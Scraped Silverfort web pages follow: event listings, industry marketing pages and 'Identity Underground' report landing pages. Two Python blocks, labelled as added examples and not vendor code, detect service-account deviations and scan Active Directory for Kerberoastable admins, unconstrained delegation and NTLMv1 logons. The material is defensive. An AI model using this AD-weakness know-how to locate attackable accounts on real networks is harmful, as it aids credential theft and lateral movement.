Meet our team to explore how identity security is evolving — and how your organization can stay ahead. New York, US 18 November 2025 Silverfort is excited to join IANS Chicago this November. Come see us and chat about all things cybersecurity for 2026! Chicago, IL, US EMEA 27 August 2025 Silverfort is proud to support our Benelux partner Jarviss at CONTXT 2025. Meet Fred and Davy onsite as we join their annual customer event. Ghent, Belgium 9 September 2025 Silverfort is heading to Connexta Security Day in Paderborn! Visit our booth to discover how end-to-end identity security can strengthen your security posture. Paderborn, Germany 10 September 2025 Silverfort will be at Bechtle Security World 2025 in Hamburg — with a booth and a speaking slot! (German speaking event) Hamburg, Germany 10 September 2025 We’re co-sponsoring Scot-Secure West with our partner Cyber Vigilance. Pete Batchelor will be attending from the Silverfort team — come say hello! Glasgow, Scotland 16 September 2025 Silverfort is exhibiting in the Cyber Zone at Fusion Live 2025, Trustmarque’s flagship event. Don’t miss our speaking session with Pete Batchelor and Kev Smith onsite. London, UK 17 September 2025 Join Silverfort at Pints & Access Insights, a casual IAM networking event hosted by our partner Thirdwave Identity. James Snowling and Scott Goodall will be there to share insights over a pint. London, UK 17 September 2025 Join Silverfort at Lyon Cyber Expo, where we’ll be hosting a station at the Metsys booth. Let’s connect on securing identities in hybrid IT environments. Lyon, France 17 September 2025 We'll be at the Public Sector Cyber Security Conference & Expo in Manchester, UK! More details to come. Manchester, UK 18 September 2025 Silverfort is sponsoring Identity Day Copenhagen 2025 in partnership with Arctic Group and ID North. Jon Martin and Al Scott will be onsite — come connect with us in the Nordics! 
Copenhagen, Denmark 18 September 2025 Join Silverfort at Identity Fabric Impact Day in Munich! Don’t miss our session with Rob Ainscough on securing privileged access, and stop by our booth to connect. Munich, Germany 18 September 2025 Silverfort is proud to be a Bronze Sponsor at CYSEC UAE 2025. Visit our booth to explore how unified identity security helps build a resilient digital future. Abu Dhabi, UAE 18 – 19 September 2025 Silverfort is excited to speak and exhibit at Integrity Partners Security Days 2025 in Olsztyn. Let’s talk about defending against identity-based threats at scale. Olsztyn, Poland 22 – 24 September 2025 Watch this space for more details of how to meet Silverfort at Gartner SEC EMEA! London, UK 25 September 2025 We’re co-sponsoring the NHS IAM Summit with our partner Bluefort. Pete Batchelor will be attending from Silverfort to discuss identity security in healthcare. Milton Keynes, UK 7 – 9 October 2025 We're exhibiting at it-sa 2025 in Nürnberg — Europe’s leading IT security expo. Visit Silverfort in Halle 7, Stand 503 to see identity security in action! Nürnberg, Germany 9 October 2025 Catch Rob Ainscough on stage at Identity Day Stockholm 2025, sponsored by our partner The Arctic Group. Rob Ainscough, Jon Martin, and Al Scott will all be attending. Stockholm, Sweden 16 October 2025 More details to follow! London, UK 21 October 2025 Silverfort is a Diamond Sponsor at Identity Days Paris 2025. Don’t miss our booth and speaking session on advancing identity-first security. Paris, France 6 November 2025 Silverfort is joining Identity-Centric Cybersecurity Impact Day 2025 in Frankfurt with a booth and a speaking session. Let’s advance identity-first security together. Frankfurt, Germany 18 – 20 November 2025 Silverfort is looking forward to meaningful 1:1 conversations at mysecurityevent in Stuttgart this November. Let’s connect! Stuttgart, Germany 25 November 2025 We’re excited to be a Silver Sponsor at Abicom Forum IT 2025. 
Stop by the Silverfort booth to learn how we’re reshaping access control in complex IT environments. Clermont-Ferrand, France 25 November 2025 More details to follow! Amsterdam, Netherlands 26–27 November 2025 Silverfort will be present at CBC Toulouse 2025 at the Metsys booth. Let’s discuss identity security strategies for hybrid and cloud environments. Toulouse, France 24–27 November 2025 Silverfort is a Platinum Sponsor of the 2025 CCN-CERT STIC Conference in Madrid. Visit our booth to explore how we help secure access across all identities and systems. Madrid, Spain APAC 19-20 August 2025 Catch up with the Silverfort APAC team at CISO Singapore! More information to follow. Singapore 20-21 August 2025 Nantharat Puwarang and Sim Yap will be at TB Cert's Cybersecurity Annual Conference 2025. Bangkok, Thailand 8 October 2025 We're looking forward to Australia's premier security conference, Security Edge. More details to come! Melbourne, Australia 17 October 2025 Meet Hiro Aoyama, Stuart Wilson and Kimimasa Sato. Japan 21-23 October 2025 Silverfort will be at Govware 2025 – watch this space for more details. Singapore Webinars & Virtual Events Thursday 23 October 2025 | 11am ET / 8am PST Identity Under Siege: Securing Finance Institutions with Modern Access Controls Join experts from the Cyber Security and Cyber Insurance spaces as they discuss scalable strategies and real-world case studies for managing identity across hybrid environments. Online --- - Published: 2024-04-29 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-telecommunications/ Telecommunications Identity security for telecoms. Defend against ransomware attacks and take your identity security where it has never gone before—all from a single platform. Get a demo or Take a platform tour Strengthening identity security posture with universal MFA. 
"The deployment of Silverfort was a smooth month-long process where they enrolled over 15,000 employees with proper MFA protection. We've worked together over the years to harden our overall identity security posture and protect ourselves against the threat of malicious actors. " Leading Telecoms provider Southeast Asia The challenge A leading telecoms provider needed to apply end-to-end MFA protection to their custom legacy telecom applications. When their employees requested access to view customer data from an application, there was no process in place to verify the user. Our solution Since deploying Silverfort, the telecom has had full visibility into all user authentication requests across all custom applications, and has proactively strengthened its security posture with complete identity security across its ever-evolving environments. Secure every dimension of identity Broadcast without cyber interruption. Silverfort enables telecom providers to mitigate the risk of malicious access across their complex environments, including the most legacy components in them. Secure access to legacy servers Protect user access to AD managed legacy servers with MFA for all Kerberos and NTLM authentications, including those that could never have been protected before. Service account visibility Get clear and comprehensive insight into all AD service accounts’ inventory, privilege level, security posture, sources and destinations, and activity patterns. Consistent protection across M&A environments Have an equal level of visibility, access control, and identity risk management across the different environments your organization has consolidated. Every user access secured. Extend MFA to any system Use MFA to secure all users, all resources and all access methods in your AD environment, from legacy servers to file shares, databases and local workstation login. 
Read more Automate service account protection Discover and protect all of your service accounts at scale by grouping them into a single policy that confines their access to their predesignated sources and destinations. Read more Monitor and govern all user activity Gain a single pane of glass to view the authentication trail of your entire user inventory, including standard workforce, admins, service accounts and external contractors. Read more Take a platform tour Learn more Explore blog --- - Published: 2024-04-29 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-finance/ Finance Identity security for financial institutions. Gain resilience against identity threats across your entire hybrid environment, from legacy apps and servers to the latest SaaS applications and cloud workloads. Get a demo or Take a platform tour Powering up identity security posture and operational efficiency with complete visibility. "We now have a streamlined set of robust security measures in place to mitigate the threat of malicious actors using compromised credentials to access our systems, as well as a solution that empowers all of our users to work more efficiently. " IT infrastructure manager, Major multinational bank The challenge The bank wanted to use its own custom MFA app as the single solution for identity verification but encountered difficulties incorporating its internal homegrown apps. 
This is because these apps don’t natively support MFA, so extending coverage to all of them would’ve required extensive code changes to each individual app. Our solution Since deploying Silverfort, the bank has rapidly improved its security posture and the efficiency of its operations with complete visibility into all user authentication requests, allowing it to easily extend its custom MFA solution to all applications, without code changes or proxies. Secure every dimension of identity All users. All resources. Silverfort enables financial institutions to gain unified visibility and access policy enforcement even in the most complex environments, across every user, admin, or NHI. Visibility to every user and resource access Gain a unified view of all your user accounts and their authentication trail to any on-prem or cloud resource, aggregating the different identities of each user as well as the multiple types of NHI. Granular identity segmentation Segment your environment based on user identities, enforcing least privileged access policies on all users, admins, and service accounts. Threat exposure management Monitor your environment for any security weaknesses that expose your users to compromise and malicious access, enabling your IAM team to prioritize and resolve them. Secure with operational confidence. Protect your admins with ease Map all your privileged users and NHI using Silverfort’s automated discovery, enforce virtual fencing policies to eliminate excessive admin access, and reinforce their secure access with JIT and MFA. Read more Stop lateral movement in real-time Place MFA and Deny Access policies on ransomware actors’ favorite spread tools, such as command-line tools and RDP, to block malicious access attempts that use compromised credentials. Read more Extend MFA to legacy apps Apply MFA policies on mission critical on-prem applications that couldn’t support MFA before, without any code modification or any other system changes. 
Read more Take a platform tour Learn more Explore blog --- - Published: 2024-04-25 - Modified: 2025-04-29 - URL: https://www.silverfort.com/identity-security-alliance/ Technology partners Identity Security Alliance We’re bringing security and identity leaders together to help businesses take their identity security where it has never gone before. Find a partner or Become a partner Get to know our partners Our Identity Security Alliance brings together next-gen technology partners to develop and deliver comprehensive, end-to-end security integrations with Silverfort that can dynamically adapt to evolving identity infrastructures. Next-Level Identity Security Silverfort complements existing IAM, MFA, and PAM partner offerings to add modern identity security to all resources across the hybrid environment. Best-In-Class Solutions With Silverfort’s ISA partners, you can be confident that your purchase decisions are based on validated and integrated solutions. Quick & Efficient Enjoy faster time to deployment and reduced technical support burden and costs due to the program’s pre-validation of solutions. Identity alliances We partner with all identity providers to secure customers’ environments with seamless product integrations, enabling strong authentication workflows while ensuring comprehensive security. 
Security alliances We collaborate with security providers to facilitate unified threat signal sharing, enabling customers to tailor identity security consumption across their SIEMs and security dashboards. --- - Published: 2024-04-23 - Modified: 2025-05-13 - URL: https://www.silverfort.com/industry/identity-security-for-education/ Education Identity security for education. Build resilience against ransomware attacks with real-time MFA and service account protection to prevent malicious access to your sensitive data. Get a demo or Take a platform tour Westminster School—In partnership with Data#3 Protecting student data with unparalleled identity security. "When you get the best of both worlds, with a great product and great people, hands down it’s a winner. Data#3 and Silverfort have become trusted advisors on this matter. " Simon MatthewsInfrastructure lead, Westminster School The challenge Westminster School counts cyber security among the most critical responsibilities of its IT department. The school wanted to minimise risk exposure by strengthening protection around legacy applications and systems. Our solution The Data#3 and Silverfort team addressed a blind spot that was not protected well by existing identity and access management products. The solution solves the technology challenge of enforcing secure authentication on all users, resources and protocols, both in on-premises and multi-cloud environments, thwarting efforts at lateral movement by malicious actors. Secure every dimension of identity Securing the identity attack surface. Silverfort enables students and staff to access critical resources securely, mitigating the risk of malicious access with compromised credentials. Secure access to legacy servers Protect user access to AD managed legacy servers with MFA for all Kerberos and NTLM authentications, including those that could never have been protected before. 
Unmanaged devices risk mitigation Closely monitor access attempts to your resources, detect access anomalies that indicate a potentially compromised device, and block them in real time. AD service accounts security Automate the discovery and protection of service accounts in your AD environments, with full visibility into each account’s activities and auto-generated access policies to prevent malicious access. Extend identity security to all users and resources. Protect the unprotectable with MFA Apply MFA policies on every AD authentication and access attempt, across command-line and screen-sharing remote access tools, to any file share, database or server. Read more Detect and block identity threats Gain real-time protection against credential access, privilege escalation, lateral movement and other types of malicious access. Read more Scale your service account protection Group all your service accounts and protect them with a single policy that places a virtual fence around each one and blocks its access upon deviation from its predesignated sources and destinations. Read more Take a platform tour Learn more Explore blog --- - Published: 2024-04-23 - Modified: 2025-05-19 - URL: https://www.silverfort.com/industry/identity-security-for-healthcare/ Healthcare Identity security for healthcare. 
Enforce adaptive MFA and identity segmentation policies on all your users, admins, and service accounts to mitigate ransomware risks and the compromise of sensitive electronic protected health information (ePHI), and comply with mandatory cyber regulations. Get a demo or Take a platform tour Protecting patient data with complete observability and security. “Silverfort allows Huntsville Hospital to enforce MFA on our privileged access accounts and has enabled us to secure our service accounts within our Active Directory environment. ” Rick Corn VP, Chief Information Officer The challenge As a healthcare provider, the most important thing for Huntsville Hospital is protecting its patients' data. They sought to understand their privileged access accounts and service accounts and enforce effective security controls on each and every one of them. Our solution With Silverfort, the team at Huntsville Hospital can now observe and protect all privileged access and service accounts in their environment. They can now be sure that their patients have confidence in the way they maintain and protect their information. Secure every dimension of identity Every user access secured. Silverfort enables healthcare organizations to safeguard access to electronic protected health information, mission-critical applications, and other sensitive data with continuous monitoring, analysis and enforcement of identity security controls on all your users and resources. Extend identity security to legacy resources MFA, JIT, and granular identity segmentation access policies are now within reach for every application and server in your AD environment, including those that you could never protect before. Protect admin access Automate the discovery of your admin users and service accounts and protect them with least privileged access policies, with no need for vaulting or password rotation. 
Block ransomware spread Enforce MFA policies on command-line access to proactively prevent attackers from moving laterally in your network, and contain active attacks in a single click using the authentication firewall. End to end visibility and protection. Extend MFA to legacy systems Apply MFA policies to every Active Directory managed resource: legacy application, file share, and other critical resources. This is the only solution that can enforce MFA on any Kerberos, NTLM, or LDAP authentication without agents or proxies. See how with Universal MFA Secure service accounts Automate the discovery and protection of all your service accounts in your AD environment, with complete visibility and auto-generated virtual fencing policies that restrict their resource access to their predesignated tasks and prevent abuse by attackers. Learn more about Service Account Protection Protect your administrative users Discover all the users that perform admin access and secure them with least privileged access policies, confining them to resources within their access tiers, and reinforce protection with JIT and MFA. 
Learn about Privileged Access Security We dared to push identity security further—so you can protect every patient, system, and caregiver. See what’s possible when identity is your first line of defense. Set up a demo to see the Silverfort Identity Security Platform in action. Get a demo Learn more Explore blog --- - Published: 2024-04-23 - Modified: 2025-05-20 - URL: https://www.silverfort.com/industry/identity-security-for-retail/ Retail Secure every transaction. Protect every customer. Ransomware actors target retailers to move laterally, disrupt operations, and steal customer data. Silverfort stops them in real time, blocking malicious access from compromised users and service accounts before attackers can reach payment systems, POS networks, or customer records. Get a demo or Take a platform tour “With Silverfort, we enforce MFA on critical systems, protect AD service accounts, and secure privileged access—without disrupting users. It gives us confidence in who's accessing our systems and helps us stay ahead of identity-based attacks and ransomware risks. ” Head of IAM, Major Multinational Retailer Secure every dimension of identity Identity is where cyber resilience ends—and where attackers strike first. With Silverfort, retailers can defend against identity-first attacks with frictionless identity security, blocking ransomware spread paths in real time—even across the most complex, hybrid retail environments. Granular visibility into every account Gain a centralized view of all your user accounts and their access trail across POS networks, loyalty platforms, supplier portals, inventory tools and other critical resources. MFA everywhere Enforce MFA policies on all user access to AD managed resources, whether it’s carried out locally or remotely with command-line access tools or RDP. 
Rapid incident response Expedite and optimize your incident response with the ability to freeze all access in a single click and automate the detection of compromised accounts with full disclosure of the attack’s path. Protect your retail environment with ease and efficiency. From in-store systems to e-commerce platforms, secure every identity across your retail operations—without slowing down your business. Enhance identity resilience Discover and resolve the hidden gaps that expose employee and vendor accounts to credential compromise, privilege escalation, or lateral movement—across both physical and digital storefronts. Read more Extend MFA to all users and access points Apply MFA to all critical retail systems—including file shares, legacy POS applications, databases, and IT infrastructure—even those previously out of reach. Read more Secure your service accounts Automatically discover and lock down service accounts so they can access only what they’re meant to—blocking attackers from hijacking them to move laterally across store networks and backend systems. Read more Take a platform tour We dared to push identity security further—so you can protect every store, system, and shopper. See what’s possible when identity is your first line of defense. Set up a demo to see the Silverfort Identity Security Platform in action. 
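The service-account "virtual fence" that the telecom, education, healthcare and retail sections above all describe (learn each account's normal sources and destinations, then alert on or block any authentication that deviates) can be sketched as detection logic over Kerberos service-ticket requests. The block below is an added example written for this page, not Silverfort's code or policy engine. It assumes that Windows Security event 4769 (TGS request) records are available as dicts carrying the event's TargetUserName, IpAddress and ServiceName fields, that a 20-event learning window is enough to trust a baseline, and that an account never seen during learning is surfaced for discovery rather than blocked; all event data is constructed.

```python
"""Virtual fence for AD service accounts built from constructed event 4769 data.
Added example for this page; not Silverfort code."""
from collections import defaultdict

MIN_OBSERVATIONS = 20  # assumption: events to learn before a baseline is enforced


def _norm_ip(ip):
    # Windows logs IPv4 clients as IPv4-mapped IPv6 ("::ffff:10.1.2.3")
    return ip[7:] if ip.startswith("::ffff:") else ip


def _norm_account(name):
    # "svc_backup@CORP.EXAMPLE" -> "svc_backup"
    return name.split("@", 1)[0].lower()


def _norm_service(svc):
    # "fs01$" and "FS01$" name the same computer account
    return svc.upper()


class ServiceAccountFence:
    """mode='alert' only reports deviations; mode='block' denies them."""

    def __init__(self, mode="alert"):
        assert mode in ("alert", "block")
        self.mode = mode
        self.sources = defaultdict(set)       # account -> {client IP}
        self.destinations = defaultdict(set)  # account -> {service / target host}
        self.observed = defaultdict(int)      # account -> events learned

    def learn(self, events):
        """Build the per-account baseline from a learning window of 4769 events."""
        for ev in events:
            acct = _norm_account(ev["TargetUserName"])
            self.sources[acct].add(_norm_ip(ev["IpAddress"]))
            self.destinations[acct].add(_norm_service(ev["ServiceName"]))
            self.observed[acct] += 1

    def evaluate(self, ev):
        """Return (verdict, reason); verdict is 'allow', 'alert' or 'block'."""
        acct = _norm_account(ev["TargetUserName"])
        if acct not in self.observed:
            # An unknown service account cannot be fenced yet; surface it.
            return "alert", "unknown service account (no baseline)"
        src = _norm_ip(ev["IpAddress"])
        dst = _norm_service(ev["ServiceName"])
        reasons = []
        if src not in self.sources[acct]:
            reasons.append("new source " + src)
        if dst not in self.destinations[acct]:
            reasons.append("new destination " + dst)
        if not reasons:
            return "allow", "within fence"
        if self.observed[acct] < MIN_OBSERVATIONS:
            return "alert", "baseline not yet mature; " + "; ".join(reasons)
        return self.mode, "; ".join(reasons)


# Constructed learning window: svc_backup works from 10.1.2.3 against FS01$ and FS02$.
LEARNING_EVENTS = [
    {"TargetUserName": "svc_backup@CORP.EXAMPLE",
     "IpAddress": "::ffff:10.1.2.3", "ServiceName": svc}
    for svc in ["FS01$", "FS02$"] * 12
]

# Constructed probes: normal use, a new client host, a new target, an unknown account.
PROBES = [
    {"TargetUserName": "svc_backup@CORP.EXAMPLE", "IpAddress": "::ffff:10.1.2.3", "ServiceName": "fs02$"},
    {"TargetUserName": "svc_backup@CORP.EXAMPLE", "IpAddress": "::ffff:10.9.9.9", "ServiceName": "FS01$"},
    {"TargetUserName": "svc_backup@CORP.EXAMPLE", "IpAddress": "::ffff:10.1.2.3", "ServiceName": "DC01$"},
    {"TargetUserName": "svc_legacy@CORP.EXAMPLE", "IpAddress": "::ffff:10.5.5.5", "ServiceName": "FS01$"},
]


def demo(mode="block"):
    """Learn the baseline and return the verdict for each probe, in order."""
    fence = ServiceAccountFence(mode=mode)
    fence.learn(LEARNING_EVENTS)
    return [fence.evaluate(ev)[0] for ev in PROBES]


if __name__ == "__main__":
    for ev, verdict in zip(PROBES, demo()):
        print(verdict, ev["TargetUserName"], ev["IpAddress"], ev["ServiceName"])
```

The two deviation probes (a ticket requested from an unfamiliar host, and a ticket for a domain controller the account never touched) are exactly the patterns a compromised service account produces during lateral movement; in a real deployment the learning window should be long enough to cover periodic jobs, and a fence should start in alert mode before being switched to block.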
Get a demo Learn more Explore blog --- - Published: 2024-04-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-identity-underground-report-thn-contributed-article/ When it comes to identity protection, what lies above the ground are the user accounts and configurations we’re aware of, for which we can design and implement defenses. But below the known identity attack surface exists an underground world of Identity Threat Exposures (ITEs): misconfigurations, forgotten user accounts, legacy settings, and insecure built-in features. These ITEs are attackers’ inside collaborators, offering an easy path to access credentials, escalate privileges, and move laterally, both on-prem and in the cloud. The Identity Underground is the first ever threat report 100% focused on the prevalence of identity security gaps – using Silverfort’s own proprietary data. The goal of this report is to provide you with insight into the identity security weaknesses you may not be aware of and empower you to make informed decisions on where to invest in identity security. Highlights of this report include: 67% of organizations expose their SaaS apps to compromise with insecure on-prem password sync. 37% of all user accounts authenticate via the weakly protected NTLM protocol, whose captured challenge-response hashes attackers can crack offline to recover passwords. 1 AD misconfiguration = 109 new shadow admins (on average). 31% of user accounts are service accounts – yet only 20% of companies are confident they can protect service accounts. And more --- - Published: 2024-04-10 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-sompo-customers/ Welcome Sompo Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. 
Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access policies to alert on or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies, with no code changes required, ensures the solution gets fully deployed in mere days Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. --- - Published: 2024-03-26 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-identity-underground-report-google-ppc/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. 
They aren’t vulnerabilities or attacks in themselves, but rather inherent weaknesses in identity infrastructure regularly used by threat actors in their attacks. As such, we decided to call these gaps Identity Threat Exposures (ITEs). The data in this report is gathered from hundreds of live production environments. Our hope is that the Identity Underground can help identity and security teams benchmark their security programs and empower them to make informed decisions on where to invest in identity security. Did you know? 31% of all users are service accounts with high access privileges and low visibility. …% of user accounts are stale and do not perform any activity. …% of admin accounts are configured to have unconstrained delegation. Identity Threat Exposures (ITEs) open your organization up to attack The Identity Underground maps out the most critical ITEs that allow attackers to access credentials, escalate privileges and move laterally, both on-prem and in the cloud. We have classified them into four categories: Password Exposers, Privilege Escalators, Lateral Movers and Protection Dodgers. ITEs are hard to eliminate and can result from a misconfiguration, malpractice, legacy identity infrastructure, or even built-in features. They are behind the steep increase in credential theft and lateral movement, a feature of nearly every attack. ITEs in this report are proven to be prevalent, impactful, and available for attackers to exploit. While there are multiple ITEs of different types, we’ve only included those that introduce a risk every organization is likely to experience. Password Exposers Expose user passwords or password hashes that attackers can steal or crack. Related MITRE ATT&CK tactic: Credential Access. Examples: NTLM authentication, NTLMv1 authentication, Admins with SPN. Privilege Escalators Enable attackers to escalate existing access privileges. 
Related MITRE ATT&CK tactic: Privilege Escalation. Examples: Shadow admins, Unconstrained delegation. Lateral Movers Allow attackers to move laterally undetected. Related MITRE ATT&CK tactic: Lateral Movement. Examples: Service accounts, Prolific users. Because its challenge-response hashes can be cracked by brute force, NTLM authentication is a prime target for attackers looking to steal credentials and move deeper into an environment. Recent research by Proofpoint shows threat actor TA577 stealing NTLM authentication information to obtain passwords. This is another example of a Password Exposer ITE. Get the full report It’s common practice for Active Directory (AD) to sync user password hashes to the cloud IdP so users can access SaaS apps with the same credentials as on-prem resources. By syncing user passwords in this way, organizations inadvertently migrate on-prem identity weaknesses to the cloud and create a Password Exposer ITE. Attackers, including the ALPHV/BlackCat ransomware group, are known to pivot from compromised on-prem environments into the cloud. Get the full report A single misconfiguration in an Active Directory account spawns 109 new shadow admins on average. Shadow admins are user accounts with the power to reset passwords or manipulate accounts in other ways. They are Privilege Escalators: attackers use shadow admins to change settings and permissions and give themselves more access to machines as they move deeper into an environment. Get the full report Almost a third of all user accounts are highly privileged service accounts. Service accounts are used for machine-to-machine communication, and are identities that have a lot of access and privileges. Attackers target service accounts, as they are often overlooked by security teams. Only 20% of companies are highly confident that they have visibility into every service account and can protect them. We consider unknown service accounts Lateral Mover ITEs. 
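Several of the ITEs named above are visible directly in Active Directory user attributes (admins carrying an SPN, accounts trusted for unconstrained delegation, service accounts with non-expiring passwords, stale accounts) or in logon events (NTLMv1). The block below is an added example for this page, not Silverfort's code and not the report's methodology. It assumes user records are plain dicts keyed by LDAP attribute name, as you would get by exporting Get-ADUser with the userAccountControl, servicePrincipalName, adminCount, memberOf and lastLogonTimestamp properties, and that logon records carry the EventID, TargetUserName, LmPackageName and IpAddress fields of Security event 4624. The 90-day staleness threshold and the list of privileged groups are assumptions, shadow admins (an ACL question) are out of scope, and all sample data is constructed.

```python
"""Find attribute-visible ITEs in AD user records and NTLMv1 logons in 4624 events.
Added example for this page; not Silverfort code."""
from datetime import datetime, timedelta, timezone

# userAccountControl bit flags (documented by Microsoft)
UAC_ACCOUNTDISABLE = 0x0002
UAC_NORMAL_ACCOUNT = 0x0200
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_TRUSTED_FOR_DELEGATION = 0x80000  # unconstrained delegation

STALE_AFTER = timedelta(days=90)  # assumption: no logon for 90 days means stale
# Assumption: membership here (or adminCount=1) marks an account as privileged
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Account Operators"}


def is_privileged(rec):
    return rec.get("adminCount") == 1 or bool(PRIVILEGED_GROUPS & set(rec.get("memberOf", ())))


def classify(rec, now):
    """Return [(ITE category, finding)] for one user record."""
    findings = []
    uac = rec.get("userAccountControl", 0)
    if uac & UAC_ACCOUNTDISABLE:
        return findings  # a disabled account cannot authenticate, so it is not exposed
    spns = rec.get("servicePrincipalName", [])
    privileged = is_privileged(rec)
    if spns and privileged:
        # Any domain user can request a TGS for the SPN and crack it offline (Kerberoasting)
        findings.append(("Password Exposer", "admin with SPN (Kerberoastable)"))
    if uac & UAC_TRUSTED_FOR_DELEGATION:
        findings.append(("Privilege Escalator", "unconstrained delegation"))
    if spns and not privileged and uac & UAC_DONT_EXPIRE_PASSWORD:
        # Heuristic for a service account: SPN plus a non-expiring password
        findings.append(("Lateral Mover", "service account (SPN, non-expiring password)"))
    last = rec.get("lastLogonTimestamp")
    if last is None or now - last > STALE_AFTER:
        # Reported on its own; the page does not assign stale accounts to one of the four categories
        findings.append(("Stale account", "no logon in %d days" % STALE_AFTER.days))
    return findings


def scan(records, now):
    """Return {sAMAccountName: findings} for every record with at least one ITE."""
    result = {}
    for name, rec in records.items():
        found = classify(rec, now)
        if found:
            result[name] = found
    return result


def ntlmv1_logons(events):
    """Return {(user, source IP)} for successful logons (4624) negotiated as NTLM V1.
    LmPackageName is 'NTLM V1', 'NTLM V2' or 'LM' for NTLM logons and '-' otherwise."""
    hits = set()
    for ev in events:
        if ev.get("EventID") == 4624 and ev.get("LmPackageName") == "NTLM V1":
            hits.add((ev["TargetUserName"].lower(), ev.get("IpAddress", "-")))
    return hits


NOW = datetime(2025, 9, 1, tzinfo=timezone.utc)  # fixed clock for the constructed data

SAMPLE_USERS = {  # constructed records, not real directory data
    "svc_sql": {"userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_EXPIRE_PASSWORD,
                "servicePrincipalName": ["MSSQLSvc/db01.corp.example:1433"],
                "lastLogonTimestamp": NOW - timedelta(days=1)},
    "jdoe_adm": {"userAccountControl": UAC_NORMAL_ACCOUNT, "adminCount": 1,
                 "memberOf": ["Domain Admins"],
                 "servicePrincipalName": ["HTTP/legacyapp.corp.example"],
                 "lastLogonTimestamp": NOW - timedelta(hours=2)},
    "appbroker": {"userAccountControl": UAC_NORMAL_ACCOUNT | UAC_TRUSTED_FOR_DELEGATION,
                  "lastLogonTimestamp": NOW - timedelta(days=1)},
    "contractor_old": {"userAccountControl": UAC_NORMAL_ACCOUNT,
                       "lastLogonTimestamp": NOW - timedelta(days=400)},
    "alice": {"userAccountControl": UAC_NORMAL_ACCOUNT,
              "lastLogonTimestamp": NOW - timedelta(days=3)},
    "svc_disabled": {"userAccountControl": UAC_NORMAL_ACCOUNT | UAC_ACCOUNTDISABLE | UAC_DONT_EXPIRE_PASSWORD,
                     "servicePrincipalName": ["HOST/old01.corp.example"]},
}

SAMPLE_LOGONS = [  # constructed 4624/4625 records
    {"EventID": 4624, "TargetUserName": "bob", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V1", "IpAddress": "10.1.7.7"},
    {"EventID": 4624, "TargetUserName": "alice", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "IpAddress": "10.1.8.8"},
    {"EventID": 4624, "TargetUserName": "carol", "AuthenticationPackageName": "Kerberos",
     "LmPackageName": "-", "IpAddress": "10.1.9.9"},
    {"EventID": 4625, "TargetUserName": "bob", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V1", "IpAddress": "10.1.7.7"},
]

if __name__ == "__main__":
    for name, found in scan(SAMPLE_USERS, NOW).items():
        print(name, found)
    print("NTLMv1 logons:", ntlmv1_logons(SAMPLE_LOGONS))
```

The same checks run against a live domain by feeding the output of Get-ADUser (for the attributes) and Get-WinEvent on the Security log (for 4624 events) into these functions; the findings map straight onto the remediation steps that follow: eliminate what a configuration change can remove (unconstrained delegation, SPNs on admin accounts), and monitor and fence what cannot be removed (service accounts, residual NTLM use).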
Get the full report What you can do today to protect your organization Identity remains an insidious part of nearly every attack. An underground world of Identity Threat Exposures contributes to an organization’s identity attack surface. The good news is that there are actions you can take today to eliminate these ITEs and bolster your identity security. 01 Know where you’re exposed and eliminate risk where possible Gain visibility into the ITEs in your environment, follow Microsoft’s best practices and weed out any ITEs that result from malpractices or misconfigurations. 02 Contain and monitor existing risks For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, monitor these accounts closely for any sign of compromise. 03 Take preventative measures Apply identity segmentation rules or MFA policies to protect user accounts and enforce access policies on your service accounts. 04 Connect the identity and security teams Combine the areas of expertise of your identity and security teams to prioritize and implement fixes against ITEs.   Get the world’s first report 100% dedicated to revealing identity threat exposures. --- - Published: 2024-03-26 - Modified: 2024-09-11 - URL: https://www.silverfort.com/the-identity-underground-report-li-ppc/ Silverfort THE IDENTITY UNDERGROUND REPORT The most common identity security gaps that lead to compromise Get the full report Your defenses are sky high – but underground you’re exposed. We noticed a gap in cybersecurity research. Most threat reports available today go into great detail about malware, threat actors, and attack kill chains, but they include very little data on the identity gaps and weaknesses that play a part in almost every cyber attack. We decided to change that. The Identity Underground is the first attempt to map out the most critical identity security weaknesses that lead to credential theft, privilege escalation or lateral movement — both on-prem and in the cloud. 
